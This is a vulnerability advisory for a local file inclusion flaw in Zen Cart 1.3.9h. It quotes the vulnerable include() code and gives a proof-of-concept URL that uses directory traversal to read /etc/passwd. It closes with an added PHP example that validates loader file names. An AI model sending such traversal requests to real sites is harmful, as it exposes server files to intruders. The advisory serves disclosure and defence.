Zen Cart 1.3.9h Local File Inclusion Vulnerability

 Name              Zen Cart
 Vendor            http://www.zen-cart.com
 Versions Affected 1.3.9h

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-11-03

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX


I. ABOUT THE APPLICATION
________________________

Zen Cart truly is the art of e-commerce; free, user-friendly,
open source shopping cart software. The ecommerce web site
design program is being developed by a group of like-minded
shop owners, programmers, designers, and consultants that
think ecommerce web design could be and should be done
differently.


II. DESCRIPTION
_______________

A parameter is not properly sanitised before being used by
PHP's include() function.


III. ANALYSIS
_____________

Summary:

 A) Local File Inclusion


A) Local File Inclusion
_______________________

Input passed to the "loader_file" parameter in
includes/initsystem.php is not properly verified before
being used to include files. This can be exploited to
include arbitrary files from local resources via directory
traversal attacks.

Successful exploitation requires that register_globals is
set to On.

The following is the vulnerable code:

    <?php

    $base_dir = DIR_WS_INCLUDES . 'auto_loaders/';
    if (file_exists(DIR_WS_INCLUDES . 'auto_loaders/overrides/' . $loader_file)) {
        $base_dir = DIR_WS_INCLUDES . 'auto_loaders/overrides/';
    }

    // $loader_file reaches include() without any validation
    include($base_dir . $loader_file);


IV. SAMPLE CODE
_______________

A) Local File Inclusion

http://site/path/includes/initsystem.php?loader_file=../../../../../../../../etc/passwd


V. FIX
______

No fix.
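
The following is an added example of how the include in section III could be constrained; it is not Zen Cart code and not a vendor patch. The helper name resolve_loader_file(), the sample file name config.core.php and the temporary directory tree are assumptions made for the demonstration.

```php
<?php
declare(strict_types=1);

// Added example, not Zen Cart code. resolve_loader_file() is a hypothetical
// helper: it maps a loader name to a file under <includes>/auto_loaders/ and
// returns null for anything else.
function resolve_loader_file(string $includesDir, string $loaderFile): ?string
{
    // 1. Bare file name only: no "/" or "\", no NUL byte, must end in .php.
    if (!preg_match('/\A[A-Za-z0-9_.-]+\.php\z/', $loaderFile)) {
        return null;
    }
    $root = realpath($includesDir . '/auto_loaders');
    if ($root === false) {
        return null;
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    // 2. Same lookup order as the vulnerable code: overrides/ first, then base.
    foreach (['overrides' . DIRECTORY_SEPARATOR, ''] as $sub) {
        $real = realpath($prefix . $sub . $loaderFile);
        // 3. The canonical path must still sit under auto_loaders/ (this also
        //    catches symlinks that point elsewhere).
        if ($real !== false && is_file($real)
            && strncmp($real, $prefix, strlen($prefix)) === 0) {
            return $real;
        }
    }
    return null;
}

// Constructed sample tree so the script runs on its own.
$includes = sys_get_temp_dir() . DIRECTORY_SEPARATOR . uniqid('zc_demo_') . '/includes';
mkdir($includes . '/auto_loaders/overrides', 0700, true);
file_put_contents($includes . '/auto_loaders/config.core.php', "<?php\n");

// Constructed inputs: one legitimate name, the advisory's traversal string,
// a name with a path separator, and a file that does not exist.
$cases = ['config.core.php', '../../../../../../../../etc/passwd',
          'overrides/../config.core.php', 'missing.php'];
foreach ($cases as $name) {
    $path = resolve_loader_file($includes, $name);
    printf("%-36s => %s\n", $name, $path === null ? 'rejected' : 'include ' . basename($path));
}
```

The include() call then takes only the returned path, and a null result is treated as an error. The check holds whether or not register_globals has populated $loader_file from the request.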